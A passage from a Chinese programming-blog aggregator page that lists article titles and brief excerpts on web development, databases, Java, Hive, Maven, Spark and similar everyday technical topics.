    HTML5拖拽API应用目录设置可拖动元素监听拖拽事件设置目标区域使用dataTransfer对象传递数据自定义拖动图像HTML5拖拽API允许开发者创建交互性强的web应用,让用户能够直接在浏览器中拖动元素,并将其放置到其他位置或目标元素上。设置可拖动元素要使一个HTML元素可拖动,需要为其添加draggable=“true”属性。Dragme!监听拖拽事件可拖动元素上可以绑定以下拖拽相关事件的
  • HTML5 本地数据库及应用 天涯学馆 大前端&移动端全栈架构html5数据库前端
    HTML5本地数据库及应用目录WebSQL数据库创建与打开执行SQL插入、查询、更新、删除数据事务处理限制与弃用IndexDB打开数据库创建/修改对象插入数据查询数据更新和删除数据索引优化查询WebSQLWebSQL是HTML5规范中提出的一种基于SQL的客户端数据库存储技术,允许在浏览器端创建和操作关系型数据库。尽管WebSQL曾被纳入HTML5草案,但由于种种原因(如标准化进程停滞、缺乏跨浏览
  • 全面认识Web标准和浏览器内核引擎 天涯学馆 大前端&移动端全栈架构前端javascript前端框架
    全面认识Web标准和浏览器内核引擎目录Web、网页、浏览器Web网页浏览器Web标准W3C组织Web标准浏览器常见的浏览器浏览器的组成浏览器工作原理Web、网页、浏览器WebWeb(WorldWideWeb)即全球广域网,也称为万维网。我们常说的Web端就是网页端。网页网页是构成网站的基本元素。网页主要由文字、图像和超链接等元素构成。当然,除了这些元素,网页中还可以包含音频、视频以及Flash等。
  • html自学学多久,HTML和CSS要学多久? 入门需要多长时间? 安检 html自学学多久
    HTML和CSS要学多久?相信很多想要学习网页前端开发的小伙伴都会有这个疑问,今天W3Cschool小编就来和大家探讨一下这个问题。作为Web前端开发的基础,HTML和CSS是都是非常基础的语言,但是想要以此为工作的话,只是掌握HTML和CSS还是不够的,JS也需要学习。这样还不够,最好还能花一些时间学习一下近几年非常火的HTML5和CSS3,这样才能算是完全掌握了Web前端相关技术。如果单说HT
  • 基于TS手写前端MVC框架简单实现购物车功能 千锋HTML5大前端 前端html5前端技术文章前端mvcjavascript
    一、后端TS版搭起MVC架构的web服务器注意点:1.用TS写node服务器需要先下nodeAPI的TS库2.通过引入文件,通过回调方式,将参数传入引入文件进行不同层的联动操作3.事件侦听,抛发的方式完成路由操作项目目录说明:1.main:0)入口文件1)创建了main单例,在当前页面执行main实例的init方法,即直接nodemain.js开启服务2)init方法中根据引入的sever类,创建
  • socket服务器断开消息,详解JS WebSocket断开原因和心跳机制 反海 socket服务器断开消息
    1、断开原因WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。ws.onclose=function(e){console.log('websocket断开:'+e.code+''+e.reason+''+e.wasClean)console.log(e)}错误状态码:WebSocket断开时,会触发CloseEvent,CloseEvent会在连接关闭时发送给使
  • Python中如何获取HTTP请求的Response Body 傻啦嘿哟 关于python那些事儿pythonhttp开发语言
    目录一、引言二、使用urllib库获取ResponseBody1.基本用法2.发送POST请求三、使用requests库获取ResponseBody1.安装requests库2.基本用法3.发送POST请求4.处理JSON响应四、高级用法1.处理请求头2.设置超时3.处理Cookies五、案例:爬取网页内容六、总结在Python中进行网络编程和Web开发时,经常需要发送HTTP请求并处理服务器返回
  • webview加载页面有2秒白屏_iOS App秒开H5实战总结 weixin_39875419
    作者|肖亚东,目前就职于南京有货,主要从事iOS和小程序端的开发,伪前端,喜爱RN、flutter等跨平台技术。热爱电影,美食,篮球,偶像科比,朋友都称他曼巴来源|https://juejin.im/user/593a775561ff4b006c76346a在《iOSapp秒开H5优化探索》一文中简单介绍了优化的方案以及一些知识点,本文继续介绍使用WKURLSchemeHandler拦截加载离线包
  • flutter 解析html文件,Flutter WebView加载本地html的问题 佛念法苏法念你 flutter解析html文件
    最近项目中,用到了flutter中的webview加载带有echarts控件的html文件,但是发现图表一直无法显示,通过查询相关资料,分析apk包文件,知道了是由于flutter项目中的文件打包后的路径发生变化,造成找不到相关依赖,特此记录一下,使用下面这个方法便可以解析出Android和IOS打包后的apk中资源文件的实际位置。///获取打包后的资源文件实际路径///如assets/files
  • Flutter中使用WebView加载html页面时下载js_css文件的流程 LuiChun Dartflutter
    开发者文档用户界面代码注释技术文档《WebView》不同场景下的最佳称呼选择使用"Web视图控件"或"网页容器组件"面向开发人员使用"应用内浏览器"或"网页显示组件"面向最终用户使用"网页视图组件"或"内嵌浏览器组件"代码文档说明使用"混合视图组件"或"网页交互组件"技术方案文档开发者文档用户界面代码注释技术文档1:WebView加载HTML页面的资源下载机制:流程表达方式图1:WebView浏览
  • 1.Introduction to Spring Web MVC framework Freeking1024 SpringMVC前端mvcspring
    WebMVCframework文档:22.WebMVCframework(spring.io)概述WebMVC框架(WebModel-View-ControllerFramework)是一种用于构建Web应用程序的软件架构模式。MVC模式将应用程序分为三个主要组件:模型(Model)、视图(View)和控制器(Controller)。这种分离有助于组织代码和简化开发和维护过程。以下是MVC框架的三
  • 什么是A端、B端、C端? 爆炸糖_Alex 杂七杂八的普及产品经理
    初始含义:A端---开发界面。即管理员所接触的界面。B端---商家界面。即浏览器界面,依托于web界面。C端---用户界面。即app的界面,用户所接触最为广泛的界面。互联网含义:A端是开发者运营商。既是我们技术提供方,项目运营方。B端是企业用户销售员用户。既是服务于C端的人员,商户端。C端是个人用户消费者。既然是个人用户,又可称为客户端。
  • 基于UHST协议的网络通信Ping实现 金融先生-Frank
    本文还有配套的精品资源,点击获取简介:网络通信中的ping命令是网络诊断工具的基础,传统上使用ICMP协议。本项目介绍了一个基于UHST(通用HTTP流传输)协议实现的ping功能,适合现代Web环境。UHST作为P2P通信协议,支持设备间直接交换数据,无需中心服务器,非常适合实时WebRTC应用。示例包括UHST主机创建、连接建立、消息传递、以及连接断开等关键步骤,使用原生JavaScript和
  • Spring Boot拦截器:掌握Web请求的“守门员” 码农技术栈 架构微服务后端springboot
    在SpringBoot中,拦截器(Interceptor)就像是一个门卫,能够在请求到达控制器之前或之后进行一些检查或操作。使用拦截器通常包含以下几个步骤:1.定义拦截器首先,你需要创建一个拦截器类,这个类要实现HandlerInterceptor接口。这个接口中有三个方法:•preHandle():在请求到达控制器之前执行。你可以在这个方法中进行权限验证、日志记录等操作。如果返回true,请求会
  • B/S系统开发初探 我是一道光_ javascript语言web开发html扩展css
    看完牛腩老师的[新闻发布系统],也算是初探B/S模式开发门目了。HTML部分的知识,相对来说还是很好理解的,也就是符合规范的一些页面元素,相关格式、效果都是依靠页面元素的相关属性来设置的,和其他计算机语言是没什么区别的。按照我的理解,Css部分的知识就是针对HTML部分的支撑和扩展抽象,使用了CSS样式以后,Web编程中的页面处理更加简便了,使得界面设计更加灵活。还有很多特点,我还没有深入体会。新
  • SQL的各种连接查询 xieke90 UNION ALLUNION外连接内连接JOIN
    一、内连接   概念:内连接就是使用比较运算符根据每个表共有的列的值匹配两个表中的行。                 内连接(join 或者inner join )       SQL语法:       select * fron
  • java编程思想--复用类 百合不是茶 java继承代理组合final类
          复用类看着标题都不知道是什么,再加上java编程思想翻译的比价难懂,所以知道现在才看这本软件界的奇书   一:组合语法:就是将对象的引用放到新类中即可     代码:     package com.wj.reuse; /** * * @author Administrator 组
  • [开源与生态系统]国产CPU的生态系统 comsci cpu
          计算机要从娃娃抓起...而孩子最喜欢玩游戏....       要让国产CPU在国内市场形成自己的生态系统和产业链,国家和企业就不能够忘记游戏这个非常关键的环节....       投入一些资金和资源,人力和政策,让游
  • JVM内存区域划分Eden Space、Survivor Space、Tenured Gen,Perm Gen解释 商人shang jvm内存
    jvm区域总体分两类,heap区和非heap区。heap区又分:Eden Space(伊甸园)、Survivor Space(幸存者区)、Tenured Gen(老年代-养老区)。 非heap区又分:Code Cache(代码缓存区)、Perm Gen(永久代)、Jvm Stack(java虚拟机栈)、Local Method Statck(本地方法栈)。 HotSpot虚拟机GC算法采用分代收
  • 页面上调用 QQ oloz qq
    <A href="tencent://message/?uin=707321921&amp;Site=有事Q我&amp;Menu=yes">   <img style="border:0px;" src=http://wpa.qq.com/pa?p=1:707321921:1></a>
  • 一些问题 文强chu 问题
    1.eclipse 导出 doc  出现“The Javadoc command does not exist.” javadoc command 选择 jdk/bin/javadoc.exe 2.tomcate 配置 web 项目 ..... SQL:3.mysql  * 必须得放前面 否则  select&nbs
  • 生活没有安全感 小桔子 生活孤独安全感
           圈子好小,身边朋友没几个,交心的更是少之又少。在深圳,除了男朋友,没几个亲密的人。不知不觉男朋友成了唯一的依靠,毫不夸张的说,业余生活的全部。现在感情好,也很幸福的。但是说不准难免人心会变嘛,不发生什么大家都乐融融,发生什么很难处理。我想说如果不幸被分手(无论原因如何),生活难免变化很大,在深圳,我没交心的朋友。明
  • php 基础语法 aichenglong php 基本语法
    1 .1 php变量必须以$开头 <?php $a=” b”; echo ?> 1 .2 php基本数据库类型 Integer  float/double Boolean string 1 .3 复合数据类型 数组array和对象 object 1 .4 特殊数据类型  null 资源类型(resource)    $co
  • mybatis tools 配置详解 AILIKES mybatis
    MyBatis Generator中文文档 MyBatis Generator中文文档地址: http://generator.sturgeon.mopaas.com/ 该中文文档由于尽可能和原文内容一致,所以有些地方如果不熟悉,看中文版的文档的也会有一定的障碍,所以本章根据该中文文档以及实际应用,使用通俗的语言来讲解详细的配置。 本文使用Markdown进行编辑,但是博客显示效
  • 继承与多态的探讨 百合不是茶 JAVA面向对象 继承 对象
    继承 extends   多态 继承是面向对象最经常使用的特征之一:继承语法是通过继承发、基类的域和方法 //继承就是从现有的类中生成一个新的类,这个新类拥有现有类的所有extends是使用继承的关键字:     在A类中定义属性和方法; class A{ //定义属性 int age; //定义方法 public void go
  • JS的undefined与null的实例 bijian1013 JavaScriptJavaScript
    <form name="theform" id="theform"> </form> <script language="javascript"> var a alert(typeof(b)); //这里提示undefined if(theform.datas
  • TDD实践(一) bijian1013 java敏捷TDD
    一.TDD概述         TDD:测试驱动开发,它的基本思想就是在开发功能代码之前,先编写测试代码。也就是说在明确要开发某个功能后,首先思考如何对这个功能进行测试,并完成测试代码的编写,然后编写相关的代码满足这些测试用例。然后循环进行添加其他功能,直到完全部功能的开发。     
  • [Maven学习笔记十]Maven Profile与资源文件过滤器 bit1129 maven
    什么是Maven Profile Maven Profile的含义是针对编译打包环境和编译打包目的配置定制,可以在不同的环境上选择相应的配置,例如DB信息,可以根据是为开发环境编译打包,还是为生产环境编译打包,动态的选择正确的DB配置信息   Profile的激活机制 1.Profile可以手工激活,比如在Intellij Idea的Maven Project视图中可以选择一个P
  • 【Hive八】Hive用户自定义生成表函数(UDTF) bit1129 hive
    1. 什么是UDTF   UDTF,是User Defined Table-Generating Functions,一眼看上去,貌似是用户自定义生成表函数,这个生成表不应该理解为生成了一个HQL Table, 貌似更应该理解为生成了类似关系表的二维行数据集   2. 如何实现UDTF 继承org.apache.hadoop.hive.ql.udf.generic
  • tfs restful api 加auth 2.0认计 ronin47
      目前思考如何给tfs的ngx-tfs api增加安全性。有如下两点:   一是基于客户端的ip设置。这个比较容易实现。   二是基于OAuth2.0认证,这个需要lua,实现起来相对于一来说,有些难度。   现在重点介绍第二种方法实现思路。    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGe
  • jdk环境变量配置 byalias javajdk
    进行java开发,首先要安装jdk,安装了jdk后还要进行环境变量配置: 1、下载jdk(http://java.sun.com/javase/downloads/index.jsp),我下载的版本是:jdk-7u79-windows-x64.exe 2、安装jdk-7u79-windows-x64.exe 3、配置环境变量:右击"计算机"-->&quo
  • 《代码大全》表驱动法-Table Driven Approach-2 bylijinnan java
    package com.ljn.base; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.util.ArrayList; import java.util.Collections; import java.uti
  • SQL 数值四舍五入 小数点后保留2位 chicony 四舍五入
    1.round() 函数是四舍五入用,第一个参数是我们要被操作的数据,第二个参数是设置我们四舍五入之后小数点后显示几位。 2.numeric 函数的2个参数,第一个表示数据长度,第二个参数表示小数点后位数。 例如:   select   cast(round(12.5,2)   as   numeric(5,2))  
  • c++运算符重载 CrazyMizzz C++
    一、加+,减-,乘*,除/ 的运算符重载 Rational operator*(const Rational &x) const{ return Rational(x.a * this->a); } 在这里只写乘法的,加减除的写法类似 二、<<输出,>>输入的运算符重载      &nb
  • hive DDL语法汇总 daizj hive修改列DDL修改表
    hive DDL语法汇总 1、对表重命名 hive> ALTER TABLE table_name RENAME TO new_table_name;   2、修改表备注 hive> ALTER TABLE table_name SET TBLPROPERTIES ('comment' = new_comm
  • jbox使用说明 dcj3sjt126com Web
    参考网址:http://www.kudystudio.com/jbox/jbox-demo.html jBox v2.3 beta [ 点击下载]  技术交流QQGroup:172543951 100521167 [2011-11-11] jBox v2.3 正式版 - [调整&修复] IE6下有iframe或页面有active、applet控件
  • UISegmentedControl 开发笔记 dcj3sjt126com
      //    typedef NS_ENUM(NSInteger, UISegmentedControlStyle) {     //        UISegmentedControlStylePlain,     // large plain   &
  • Slick生成表映射文件 ekian scala
    Scala添加SLICK进行数据库操作,需在sbt文件上添加slick-codegen包 "com.typesafe.slick" %% "slick-codegen" % slickVersion 因为我是连接SQL Server数据库,还需添加slick-extensions,jtds包 "com.typesa
  • ES-TEST gengzg test
    package com.MarkNum; import java.io.IOException; import java.util.Date; import java.util.HashMap; import java.util.Map; import javax.servlet.ServletException; import javax.servlet.annotation
  • 为何外键不再推荐使用 hugh.wang mysqlDB
    表的关联,是一种逻辑关系,并不需要进行物理上的“硬关联”,而且你所期望的关联,其实只是其数据上存在一定的联系而已,而这种联系实际上是在设计之初就定义好的固有逻辑。 在业务代码中实现的时候,只要按照设计之初的这种固有关联逻辑来处理数据即可,并不需要在数据库层面进行“硬关联”,因为在数据库层面通过使用外键的方式进行“硬关联”,会带来很多额外的资源消耗来进行一致性和完整性校验,即使很多时候我们并不
  • 领域驱动设计 julyflame VODAO设计模式DTOpo
    概念: VO(View Object):视图对象,用于展示层,它的作用是把某个指定页面(或组件)的所有数据封装起来。 DTO(Data Transfer Object):数据传输对象,这个概念来源于J2EE的设计模式,原来的目的是为了EJB的分布式应用提供粗粒度的数据实体,以减少分布式调用的次数,从而提高分布式调用的性能和降低网络负载,但在这里,我泛指用于展示层与服务层之间的数据传输对
  • 单例设计模式 hm4123660 javaSingleton单例设计模式懒汉式饿汉式
           单例模式是一种常用的软件设计模式。在它的核心结构中只包含一个被称为单例类的特殊类。通过单例模式可以保证系统中一个类只有一个实例而且该实例易于外界访问,从而方便对实例个数的控制并节约系统源。如果希望在系统中某个类的对象只能存在一个,单例模式是最好的解决方案。      &nb
  • logback zhb8015 loglogback
    一、logback的介绍      Logback是由log4j创始人设计的又一个开源日志组件。logback当前分成三个模块:logback-core,logback- classic和logback-access。logback-core是其它两个模块的基础模块。logback-classic是log4j的一个 改良版本。此外logback-class
  • 整合Kafka到Spark Streaming——代码示例和挑战 Stark_Summer sparkstormzookeeperPARALLELISMprocessing
    作者Michael G. Noll是瑞士的一位工程师和研究员,效力于Verisign,是Verisign实验室的大规模数据分析基础设施(基础Hadoop)的技术主管。本文,Michael详细的演示了如何将Kafka整合到Spark Streaming中。 期间, Michael还提到了将Kafka整合到 Spark Streaming中的一些现状,非常值得阅读,虽然有一些信息在Spark 1.2版
  • spring-master-slave-commondao 王新春 DAOspringdataSourceslavemaster
    互联网的web项目,都有个特点:请求的并发量高,其中请求最耗时的db操作,又是系统优化的重中之重。 为此,往往搭建 db的 一主多从库的 数据库架构。作为web的DAO层,要保证针对主库进行写操作,对多个从库进行读操作。当然在一些请求中,为了避免主从复制的延迟导致的数据不一致性,部分的读操作也要到主库上。(这种需求一般通过业务垂直分开,比如下单业务的代码所部署的机器,读去应该也要从主库读取数
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他